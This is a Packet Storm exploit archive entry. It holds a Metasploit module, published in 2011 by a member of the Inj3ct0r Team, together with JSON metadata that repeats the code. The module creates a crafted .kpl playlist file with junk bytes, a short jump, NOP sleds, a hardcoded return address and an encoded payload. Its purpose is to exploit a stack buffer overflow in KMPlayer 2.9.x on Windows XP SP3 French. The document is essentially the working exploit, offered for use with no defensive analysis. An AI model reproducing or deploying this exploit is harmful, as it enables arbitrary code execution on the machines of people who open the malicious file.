ID PACKETSTORM:100687
Type packetstorm
Reporter KedAns-Dz
Modified 2011-04-22T00:00:00
Description
`1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm KedAns-Dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
# KMPlayer <=2.9.x (.kpl) Stack Buffer Overflow (meta)
# By KedAns-Dz
# $ kmp_sbof.rb | 21/04/2011 13:30 $
# Windows XP Sp3 Fr
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'KMPlayer 2.9.x (.kpl) Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in versions v2.9.3
creating a specially crafted .kpl file, an attacker may be able
to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => 'KedAns-Dz <ked-h[at]hotmail.com>',
'Version' => 'Version 1',
'References' =>
[
[ 'URL', 'Not Detected Olden This' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1900,
'BadChars' => "\x00\x20\x0a\x0d",
'StackAdjustment' => -3500,
'DisableNops' => 'True',
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
'EncoderOptions' =>
{
'BufferRegister' => 'ESI',
}
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP3 France', { 'Ret' => 0x0247fff4} ], # CALL from ntdll.dll
],
'Privileged' => false,
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'KedAns.kpl']),
], self.class)
end
def exploit
sploit = "[playlist]\n"
sploit << "NumberOfEntries=1\n"
sploit << "File1=http://"
sploit << "\x41" * 200 # buffer Junk
sploit << "\xeb\x06\x90\x90" # short jump
sploit << "\x90" * 30 # nop
sploit << [target.ret].pack('V')
sploit << payload.encoded
sploit << "\x90" * 543 # nop sled
sploit << ".mp3"
ked = sploit
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(ked)
end
end`
{"id": "PACKETSTORM:100687", "type": "packetstorm", "bulletinFamily": "exploit", "title": "KMPlayer 2.9.x (.kpl) Stack Buffer Overflow", "description": "", "published": "2011-04-22T00:00:00", "modified": "2011-04-22T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/100687/KMPlayer-2.9.x-.kpl-Stack-Buffer-Overflow.html", "reporter": "KedAns-Dz", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:16:39", "viewCount": 3, "enchantments": {"score": {"value": 1.1, "vector": "NONE", "modified": "2016-11-03T10:16:39", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:16:39", "rev": 2}, "vulnersScore": 1.1}, "sourceHref": "https://packetstormsecurity.com/files/download/100687/kmp_sbof.rb.txt", "sourceData": "`1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 \n0 _ __ __ __ 1 \n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0 \n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1 \n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0 \n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1 \n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0 \n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1 \n1 \\ \\____/ >> Exploit database separated by exploit 0 \n0 \\/___/ type (local, remote, DoS, etc.) 1 \n1 1 \n0 [+] Site : 1337day.com 0 \n1 [+] Support e-mail : submit[at]1337day.com 1 \n0 0 \n1 ######################################### 1 \n0 I'm KedAns-Dz member from Inj3ct0r Team 1 \n1 ######################################### 0 \n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 \n \n# KMPlayer <=2.9.x (.kpl) Stack Buffer Overflow (meta) \n# By KedAns-Dz \n# $ kmp_sbof.rb | 21/04/2011 13:30 $ \n# Windows XP Sp3 Fr \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GoodRanking \n \ninclude Msf::Exploit::FILEFORMAT \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'KMPlayer 2.9.x (.kpl) Stack Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack buffer overflow in versions v2.9.3 \ncreating a specially crafted .kpl file, an attacker may be able \nto execute arbitrary code. \n}, \n'License' => MSF_LICENSE, \n'Author' => 'KedAns-Dz <ked-h[at]hotmail.com>', \n'Version' => 'Version 1', \n'References' => \n[ \n[ 'URL', 'Not Detected Olden This' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 1900, \n'BadChars' => \"\\x00\\x20\\x0a\\x0d\", \n'StackAdjustment' => -3500, \n'DisableNops' => 'True', \n'EncoderType' => Msf::Encoder::Type::AlphanumMixed, \n'EncoderOptions' => \n{ \n'BufferRegister' => 'ESI', \n} \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows XP SP3 France', { 'Ret' => 0x0247fff4} ], # CALL from ntdll.dll \n \n], \n'Privileged' => false, \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ false, 'The file name.', 'KedAns.kpl']), \n], self.class) \nend \n \n \ndef exploit \n \nsploit = \"[playlist]\\n\" \nsploit << \"NumberOfEntries=1\\n\" \nsploit << \"File1=http://\" \nsploit << \"\\x41\" * 200 # buffer Junk \nsploit << \"\\xeb\\x06\\x90\\x90\" # short jump \nsploit << \"\\x90\" * 30 # nop \nsploit << [target.ret].pack('V') \nsploit << payload.encoded \nsploit << \"\\x90\" * 543 # nop sled \nsploit << \".mp3\" \nked = sploit \nprint_status(\"Creating '#{datastore['FILENAME']}' file ...\") \nfile_create(ked) \n \nend \n \nend`\n"}
{}